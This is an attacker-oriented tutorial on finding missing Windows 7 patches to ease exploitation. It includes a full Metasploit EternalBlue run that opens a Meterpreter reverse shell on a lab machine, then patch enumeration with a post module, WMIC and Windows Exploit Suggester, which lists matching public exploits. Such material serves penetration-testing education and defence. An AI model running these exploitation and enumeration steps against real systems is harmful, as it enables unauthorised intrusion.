How to Identify Missing Windows Patches for Easier Exploitation

Dec 12, 2019 07:00 PM
636979237105224873.jpg

No operating system is stricken with as many vulnerabilities as Windows, and it's often a race to release the latest patches to fix things. From an attacker's point of view, knowing which patches are present on a Windows machine can make or break successful exploitation. Today, we will be covering three methods of patch enumeration, using Metasploit, WMIC, and Windows Exploit Suggester.

For Metasploit, we will use a post module to find missing patches. With WMIC, we will run commands directly from a shell on the system to view quick fix engineering patches. And using Windows Exploit Suggester, we will compare the installed patches on the system with a database of vulnerabilities. We will be using Kali Linux to attack an unpatched version of Windows 7.

Method 1: Metasploit

The first method we will use to identify any missing patches on the target is Metasploit. Fire it up by typing msfconsole in the terminal.

~# msfconsole

[-] ***rting the Metasploit Framework console.../
[-] * WARNING: No database support: No database YAML file
[-] ***

         .                                         .
 .

      dBBBBBBb  dBBBP dBBBBBBP dBBBBBb  .                       o
       '   dB'                     BBP
    dB'dB'dB' dBBP     dBP     dBP BB
   dB'dB'dB' dBP      dBP     dBP  BB
  dB'dB'dB' dBBBBP   dBP     dBBBBBBB

                                   dBBBBBP  dBBBBBb  dBP    dBBBBP dBP dBBBBBBP
          .                  .                  dB' dBP    dB'.BP
                             |       dBP    dBBBB' dBP    dB'.BP dBP    dBP
                           --o--    dBP    dBP    dBP    dB'.BP dBP    dBP
                             |     dBBBBP dBP    dBBBBP dBBBBP dBP    dBP

                                                                    .
                .
        o                  To boldly go where no
                            shell has gone before

       =[ metasploit v5.0.20-dev                          ]
+ -- --=[ 1886 exploits - 1065 auxiliary - 328 post       ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]

msf5 >

We need to compromise the machine and obtain a Meterpreter session to run the post module, and since we know this is an unpatched version of Windows 7, we can quickly exploit it using EternalBlue.

Load the module with the use command:

msf5 > use exploit/windows/smb/ms17_010_eternalblue

Set the appropriate options and type run to launch the exploit:

msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.10.0.1:1337
[+] 10.10.0.104:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.0.104:445 - Connecting to target for exploitation.
[+] 10.10.0.104:445 - Connection established for exploitation.
[+] 10.10.0.104:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.0.104:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.0.104:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.0.104:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.0.104:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
[+] 10.10.0.104:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.0.104:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.0.104:445 - Sending all but last fragment of exploit packet
[*] 10.10.0.104:445 - Starting non-paged pool grooming
[+] 10.10.0.104:445 - Sending SMBv2 buffers
[+] 10.10.0.104:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.0.104:445 - Sending final SMBv2 buffers.
[*] 10.10.0.104:445 - Sending last fragment of exploit packet!
[*] 10.10.0.104:445 - Receiving response from exploit packet
[+] 10.10.0.104:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.0.104:445 - Sending egg to corrupted connection.
[*] 10.10.0.104:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 10.10.0.104
[*] Meterpreter session 1 opened (10.10.0.1:1337 -> 10.10.0.104:49228) at 2019-10-27 12:28:32 -0500
[+] 10.10.0.104:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.0.104:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.0.104:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >

We now have a Meterpreter session on the target. Since post modules work by running on an existing session in the background, we first need to background our session:

meterpreter > background

[*] Backgrounding session 1...

Then, we can load the module with the use command:

msf5 exploit(windows/smb/ms17_010_eternalblue) > use post/windows/gather/enum_patches

If we type options at the prompt, Metasploit will show us all of the available options and setting for the current module:

msf5 post(windows/gather/enum_patches) > options

Module options (post/windows/gather/enum_patches):

   Name       Current Setting       Required  Description
   ----       ---------------       --------  -----------
   KB         KB2871997, KB2928120  yes       A comma separated list of KB patches to search for
   MSFLOCALS  true                  yes       Search for missing patchs for which there is a MSF local module
   SESSION                          yes       The session to run this module on.

All we really need to set is the session number to run this on. We could specify a comma-separated list of additional patches to search for if we wanted to, but for now, the default ones will work just fine.

Use the set command to set the number of the session we have running in the background:

msf5 post(windows/gather/enum_patches) > set session 1

session => 1

And type run to kick it off:

msf5 post(windows/gather/enum_patches) > run

[+] KB2871997 is missing
[+] KB2928120 is missing
[+] KB977165 - Possibly vulnerable to MS10-015 kitrap0d if Windows 2K SP4 - Windows 7 (x86)
[+] KB2305420 - Possibly vulnerable to MS10-092 schelevator if Vista, 7, and 2008
[+] KB2592799 - Possibly vulnerable to MS11-080 afdjoinleaf if XP SP2/SP3 Win 2k3 SP2
[+] KB2778930 - Possibly vulnerable to MS13-005 hwnd_broadcast, elevates from Low to Medium integrity
[+] KB2850851 - Possibly vulnerable to MS13-053 schlamperei if x86 Win7 SP0/SP1
[+] KB2870008 - Possibly vulnerable to MS13-081 track_popup_menu if x86 Windows 7 SP0/SP1
[*] Post module execution completed

We can see that it returns the first two patches as missing, and it displays some additional potential vulnerabilities and their associated patches.

Method 2: WMIC

The next method we will use to enumerate patches uses the Windows WMIC utility. WMIC (Windows Management Instrumentation Command-Line) is a tool that is used to perform WMI operations on Windows. It is used as a command prompt of sorts and can run in both interactive and non-interactive mode.

To use this utility, we need a proper shell on the target. Luckily, we already have a Meterpreter session running, so we can use that to drop into a system shell.

Use the sessions command along with the -i flag to interact with a session:

msf5 > sessions -i 1

[*] Starting interaction with 1...

meterpreter >

This should put us at the Meterpreter prompt — now simply type shell and we will be dropped into a system shell:

meterpreter > shell

Process 2452 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>

Now we should be able to use the WMIC utility to view any patches that are installed. Type wmic qfe list at the prompt to list any quick fix engineering (QFE) patches that are present on the system:

C:\Windows\system32> wmic qfe list

wmic qfe list
Caption                                     CSName  Description  FixComments  HotFixID   InstallDate  InstalledBy        InstalledOn  Name  ServicePackInEffect  Status
http://support.microsoft.com/?kbid=2534111  W02     Hotfix                    KB2534111                                  2/25/2019
http://support.microsoft.com/?kbid=976902   W02     Update                    KB976902                W02\Administrator  11/21/2010

This will give us the ID, description, install information, and associated URL of the patches that are installed. We can also tack on full to our command to get a slightly different view of this data:

C:\Windows\system32> wmic qfe list full

wmic qfe list full

Caption=http://support.microsoft.com/?kbid=2534111
CSName=W02
Description=Hotfix
FixComments=
HotFixID=KB2534111
InstallDate=
InstalledBy=
InstalledOn=2/25/2019
Name=
ServicePackInEffect=
Status=

Caption=http://support.microsoft.com/?kbid=976902
CSName=W02
Description=Update
FixComments=
HotFixID=KB976902
InstallDate=
InstalledBy=W02\Administrator
InstalledOn=11/21/2010
Name=
ServicePackInEffect=
Status=

This method is nice because it doesn't require anything more than a basic shell on the target to run WMIC.

Method 3: Windows Exploit Suggester

The last method we will use to identify missing patches is Windows Exploit Suggester. This is a tool written in Python that will compare the patches installed on a target against a database of Microsoft vulnerabilities, all from our local machine.

Windows Exploit Suggester does require the output of systeminfo from the target to compare it against the database. Since we should still have shell access to our target, we can run the command:

C:\Windows\system32> systeminfo

systeminfo

Host Name:                 W02
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Member Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          admin2
Registered Organization:
Product ID:                00371-868-0000007-85704
Original Install Date:     2/25/2019, 2:04:46 PM
System Boot Time:          10/27/2019, 1:48:26 PM
System Manufacturer:       QEMU
System Model:              Standard PC (i440FX + PIIX, 1996)
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 15 Model 6 Stepping 1 GenuineIntel ~2533 Mhz
BIOS Version:              SeaBIOS rel-1.11.1-0-g0551a4be2c-prebuilt.qemu-project.org, 4/1/2014
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-06:00) Central Time (US & Canada)
Total Physical Memory:     2,047 MB
Available Physical Memory: 1,461 MB
Virtual Memory: Max Size:  4,095 MB
Virtual Memory: Available: 3,494 MB
Virtual Memory: In Use:    601 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    dlab.env
Logon Server:              N/A
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB2534111
                           [02]: KB976902
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.10.0.100
                                 IP address(es)
                                 [01]: 10.10.0.104
                                 [02]: fe80::104:336c:a632:e39b

And save the output to a text file on our local machine:

~# cat system_info.txt

Host Name:                 W02
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Member Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          admin2
Registered Organization:
Product ID:                00371-868-0000007-85704
Original Install Date:     2/25/2019, 2:04:46 PM
System Boot Time:          10/27/2019, 1:48:26 PM
System Manufacturer:       QEMU
System Model:              Standard PC (i440FX + PIIX, 1996)
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 15 Model 6 Stepping 1 GenuineIntel ~2533 Mhz
BIOS Version:              SeaBIOS rel-1.11.1-0-g0551a4be2c-prebuilt.qemu-project.org, 4/1/2014
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-06:00) Central Time (US & Canada)
Total Physical Memory:     2,047 MB
Available Physical Memory: 1,461 MB
Virtual Memory: Max Size:  4,095 MB
Virtual Memory: Available: 3,494 MB
Virtual Memory: In Use:    601 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    dlab.env
Logon Server:              N/A
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB2534111
                           [02]: KB976902
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.10.0.100
                                 IP address(es)
                                 [01]: 10.10.0.104
                                 [02]: fe80::104:336c:a632:e39b

Next, we need to download the script from GitHub. The easiest way to do so is with the wget utility:

~# wget https://raw.githubusercontent.com/GDSSecurity/Windows-Exploit-Suggester/master/windows-exploit-suggester.py

--2019-10-27 12:38:34--  https://raw.githubusercontent.com/GDSSecurity/Windows-Exploit-Suggester/master/windows-exploit-suggester.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.148.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.148.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 69175 (68K) [text/plain]
Saving to: ‘windows-exploit-suggester.py’

windows-exploit-suggester.py                          100%[======================================================================================================================>]  67.55K  --.-KB/s    in 0.07s

2019-10-27 12:38:34 (951 KB/s) - ‘windows-exploit-suggester.py’ saved [69175/69175]

Then, install any dependencies, which, in this case, is just the python-xlrd package:

~# apt-get install python-xlrd

Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
  python-xlrd
0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
Need to get 104 kB of archives.
After this operation, 490 kB of additional disk space will be used.
Get:1 http://kali.download/kali kali-rolling/main amd64 python-xlrd all 1.1.0-1 [104 kB]
Fetched 104 kB in 1s (144 kB/s)
Selecting previously unselected package python-xlrd.
(Reading database ... 408990 files and directories currently installed.)
Preparing to unpack .../python-xlrd_1.1.0-1_all.deb ...
Unpacking python-xlrd (1.1.0-1) ...
Setting up python-xlrd (1.1.0-1) ...
Processing triggers for man-db (2.8.5-2) ...

Now that the tool is set up, we need to generate the Microsoft security bulletin database. Windows Exploit Suggester can do this automatically with the update command:

~# python windows-exploit-suggester.py --update

[*] initiating winsploit version 3.3...
[+] writing to file 2019-10-27-mssb.xls
[*] done

We should be good to go at this point. All we have to do is run the tool, and specify the systeminfo file from earlier and the database file we just generated:

~# python windows-exploit-suggester.py --database 2019-10-27-mssb.xls --systeminfo system_info.txt

[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file

The script will run and return any patches that are missing on our target, along with their relevant information and links:

[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 2 hotfix(es) against the 386 potential bulletins(s) with a database of 137 known exploits
[*] there are now 386 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 7 SP1 64-bit'
[*]
[E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
[*]   https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k Denial of Service (MS16-135)
[*]   https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)
[*]   https://github.com/tinysec/public/tree/master/CVE-2016-7255
[*]
[E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
[*]   https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)
[*]
[M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
[*]   https://github.com/foxglovesec/RottenPotato
[*]   https://github.com/Kevin-Robertson/Tater
[*]   https://bugs.chromium.org/p/project-zero/issues/detail?id=222 -- Windows: Local WebDAV NTLM Reflection Elevation of Privilege
[*]   https://foxglovesecurity.com/2016/01/16/hot-potato/ -- Hot Potato - Windows Privilege Escalation
[*]
[E] MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important
[*]   https://www.exploit-db.com/exploits/39990/ -- Windows - gdi32.dll Multiple DIB-Related EMF Record Handlers Heap-Based Out-of-Bounds Reads/Memory Disclosure (MS16-074), PoC
[*]   https://www.exploit-db.com/exploits/39991/ -- Windows Kernel - ATMFD.DLL NamedEscape 0x250C Pool Corruption (MS16-074), PoC
[*]
[E] MS16-063: Cumulative Security Update for Internet Explorer (3163649) - Critical
[*]   https://www.exploit-db.com/exploits/39994/ -- Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063), PoC
[*]
[E] MS16-059: Security Update for Windows Media Center (3150220) - Important
[*]   https://www.exploit-db.com/exploits/39805/ -- Microsoft Windows Media Center - .MCL File Processing Remote Code Execution (MS16-059), PoC
[*]
[E] MS16-056: Security Update for Windows Journal (3156761) - Critical
[*]   https://www.exploit-db.com/exploits/40881/ -- Microsoft Internet Explorer - jscript9 Java­Script­Stack­Walker Memory Corruption (MS15-056)
[*]   http://blog.skylined.nl/20161206001.html -- MSIE jscript9 Java­Script­Stack­Walker memory corruption

...

[M] MS14-012: Cumulative Security Update for Internet Explorer (2925418) - Critical
[M] MS14-009: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2916607) - Important
[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important
[M] MS13-097: Cumulative Security Update for Internet Explorer (2898785) - Critical
[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
[M] MS13-080: Cumulative Security Update for Internet Explorer (2879017) - Critical
[M] MS13-069: Cumulative Security Update for Internet Explorer (2870699) - Critical
[M] MS13-059: Cumulative Security Update for Internet Explorer (2862772) - Critical
[M] MS13-055: Cumulative Security Update for Internet Explorer (2846071) - Critical
[M] MS13-053: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2850851) - Critical
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[*] done

This method is perhaps the most thorough since we are utilizing an updated database of patches to compare to the target. It also has the advantage of being able to run remotely.

Wrapping Up

In this tutorial, we explored a few methods to identify missing patches on a Windows machine. First, we used a Metasploit post module to achieve this, followed by the WMIC utility on Windows, and finally, the Windows Exploit Suggester Python script. Patch enumeration is extremely important when attacking Windows, as it narrows down the number of potential exploits, saves time, and generally just makes things easier.

Cover image by Breakingpic/Pexels; Screenshots by drd_/Null Byte

Comments

No Comments Exist

Be the first, drop a comment!